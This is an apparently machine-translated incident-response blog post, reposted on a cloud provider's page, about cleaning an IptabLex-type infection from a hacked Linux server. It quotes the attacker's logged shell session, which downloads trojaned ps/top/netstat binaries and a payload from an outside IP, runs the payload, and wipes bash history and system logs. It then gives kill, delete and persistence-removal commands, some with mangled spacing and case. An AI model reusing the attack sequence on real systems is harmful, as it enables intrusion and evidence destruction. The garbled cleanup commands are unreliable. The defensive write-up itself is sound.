Linux hosts are hacked and simple to process

Source: Internet
Author: User
Tags syslog

Below is the process of a public network host being hacked

(The following records are fetched through the Prompt_command system environment variable)

Nov 03:24:32 * * *: [euid=root]::[/root]#

Nov 03:24:34 * * *: [euid=root]::[/root]# history

Nov 03:26:52 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/libproc-3.2.5.so

Nov 03:26:55 * * *: [euid=root]::[/root]# wget Http://222.186.31.229:52636/ps

Nov 03:26:57 * * *: [euid=root]::[/root]# wget Http://222.186.31.229:52636/top

Nov 03:27:00 * * *: [euid=root]::[/root]# wget Http://222.186.31.229:52636/netstat

Nov 03:27:03 * * *: [euid=root]::[/root]# chmod 777 PS

Nov 03:27:05 * * *: [euid=root]::[/root]# chmod 777 Top

Nov 03:27:08 * * *: [euid=root]::[/root]# chmod 777 Netstat

Nov 03:27:11 * * *: [euid=root]::[/root]# CP libproc-3.2.5.so/usr/lib64

Nov 03:27:14 * * *: [euid=root]::[/root]# rm-f/bin/ps

Nov 03:27:16 * * *: [euid=root]::[/root]# rm-f/usr/bin/top

Nov 03:27:19 * * *: [euid=root]::[/root]# rm-f/bin/netstat

Nov 03:27:21 * * *: [euid=root]::[/root]# CP Top/usr/bin

Nov 03:27:24 * * *: [euid=root]::[/root]# CP Ps/bin

Nov 03:27:29 * * *: [euid=root]::[/root]# CP Netstat/bin

Nov 03:27:33 * * *: [euid=root]::[/root]# Ps-ef

Nov 03:27:35 * * *: [euid=root]::[/root]# Top

Nov 03:27:38 * * *: [euid=root]::[/root]# NETSTAT-ANP

Nov 03:27:40 * * *: [euid=root]::[/root]# Netstat-an

Nov 03:27:50 * * *: [euid=root]::[/root]# wget http://222.186.31.229:52636/Internet

Nov 03:27:52 * * *: [euid=root]::[/root]# chmod 0755/root/internet

Nov 03:27:56 * * *: [euid=root]::[/root]# nohup/root/internet >/dev/null 2>&1 &

Nov 03:27:57 * *: [euid=root]::[/root]# ls

Nov 03:28:01 * *: [euid=root]::[/root]# rm-rf Internet

Nov 03:28:03 * * *: [euid=root]::[/root]# RM-RF PS

Nov 03:28:05 * *: [euid=root]::[/root]# RM-RF Top

Nov 03:28:08 * * *: [euid=root]::[/root]# rm-rf libproc-3.2.5.so

Nov 03:28:10 * * *: [euid=root]::[/root]# rm-rf netstat

Nov 03:28:10 * *: [euid=root]::[/root]# ls

Nov 03:28:14 * * *: [euid=root]::[/root]# rm-rf fake.cfg

Nov 03:28:15 * *: [euid=root]::[/root]# ls

Nov 03:28:21 * * *: [euid=root]::[/root]# rm-rf. bash_history

Nov 03:28:23 * * *: [euid=root]::[/root]#

Nov 03:28:24 * * *: [euid=root]::[/root]# history

Nov 03:28:30 * * *: [euid=root]::[/root]# rm-rf/root/.bash_history

Nov 03:28:30 * * *: [euid=root]::[/root]#

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/syslog

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/messages

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/access_log

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/error_log

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/xferlog

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/secure

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/auth.log

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/user.log

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/wtmp

Nov 03:28:30 * * *: [euid=root]::[/root]# Echo>/var/log/lastlog

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/log/btmp

Nov 03:28:30 * * *: [euid=root]::[/root]# echo>/var/run/utmp

Nov 03:28:31 * * *: [euid=root]::[/root]# rm-rf/root/.bash_history

Nov 03:28:31 * * *: [euid=root]::[/root]#

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/syslog

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/messages

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/access_log

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/httpd/error_log

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/xferlog

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/secure

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/auth.log

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/user.log

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/wtmp

Nov 03:28:31 * * *: [euid=root]::[/root]# Echo>/var/log/lastlog

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/log/btmp

Nov 03:28:31 * * *: [euid=root]::[/root]# echo>/var/run/utmp

Nov 03:28:37 * * *: [euid=root]::[/root]# rm-rf. bash_history

Nov 03:28:39 * * *: [euid=root]::[/root]#

Nov 03:28:40 * * *: [euid=root]::[/root]# history


The phenomenon after the middle recruit:

1, the host contract seriously, blocking the network.

2, the exception process directly after the kill will automatically generate a new process again.

3, some abnormal process is a random name, kill after the name will change

4, the exception process port number is random port


The process of exception is a variant of IptabLex, and the process is similar:

then check the source, there are several documents:
/boot/iptables
/boot/iptablex
/boot/. IptabLes
/boot/. IptabLex

# Cat/boot/iptablex
#!/bin/sh
/boot/. IptabLex
Exit 0

# Cat/boot/iptables
#!/bin/sh
/boot/. IptabLes
Exit 0

. IptabLes and. IptabLes file, it's possible that you have binary files


Killall-9 SCC

Killall-9. IptabLes

Killall-9. IptabLex

Killall-9 profile; Killall-9 Profileh;

Killall-9 Install; Killall-9 Installh;

Killall-9 Office; Killall-9 Officeh;

Killall-9 history

Killall-9 node


Rm-f/boot/*iptables

Rm-f/boot/*iptablex

Rm-f/boot/. IptabLes

Rm-f/etc/rc.d/iptablex

Rm-f/etc/rc.d/rc2.d/*iptablex

Rm-f/etc/rc.d/rc2.d/*iptables

Rm-f/etc/rc.d/rc3.d/*iptablex

Rm-f/etc/rc.d/rc3.d/*iptables

Rm-f/etc/rc.d/rc4.d/*iptablex

Rm-f/etc/rc.d/rc4.d/*iptables

Rm-f/etc/rc.d/rc5.d/*iptablex

Rm-f/etc/rc.d/rc5.d/*iptables

Rm-f/etc/rc.d/iptables

Rm-f/usr/. IptabLes

Rm-f/usr/. IptabLex

Rm-f/etc/rc.d/init.d/iptable*


and the replaced system command is repaired.


The above processing can basically solve the problem.


There is a tricky situation where a malicious program generates a bunch of process names similar to a system process:

Pwd

Ps-ef

Netstat-an


For such malicious processes, the kill is not completely erased.

You need to clear the/lib/libgcc* library file to prevent the malicious program from starting again.


1. Clear the/etc/crontab in the Udev , while clearing the/etc/cron.hourly udev.sh

2.netstat-enlp|more

The exception port and process in the kill process, sometimes TCP sometimes has UDP, process name shape such as Netstatps , and so on, clean up the next step

3.rm-rf/lib/libgcc*

4. View netstat-anlp NETSTAT-ENLP no exception process and port open

This article from "Cexpert" blog, reproduced please contact the author!

Linux hosts are hacked and simple to process

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.